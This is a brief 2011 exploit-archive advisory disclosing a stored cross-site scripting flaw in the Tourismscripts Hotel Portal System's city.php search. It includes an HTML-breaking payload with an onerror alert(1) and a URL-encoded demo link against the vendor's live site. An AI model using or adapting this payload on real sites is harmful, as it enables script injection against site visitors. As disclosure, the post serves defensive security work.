Home / exploits Tourismscripts Hotel Portal System Cross Site Scripting
Posted on 23 August 2011
# Exploit Title: Tourismscripts Hotel Portal System Stored XSS # Date: 2011 # Author: Eyup CELIK # Version: All Version # Tested on: All versions are Vulnerability ISSUE Cross Site Scripting can be done using the command input Vulnerable Page: city.php (Search Modules) Exploit: "/></a></><img src=1.gif onerror=alert(1)> Demo: http://hotel.tourismscripts.com/city.php?hotel_city=%22%2F%3E%3C%2Fa%3E%3C%2F%3E%3Cimg+src%3D1.gif+onerror%3Dalert%281%29%3E&dayfrom=23&monthfrom=8&yearfrom=2011&dayback=24&monthback=8&yearback=2011&guest=1&rooms=1&hotel_stars=&pricefrom=0&pricetill=250&B1=Search Thanks, Eyup CELIK Bilgi Teknolojileri Güvenlik Uzmani http://www.eyupcelik.com.tr
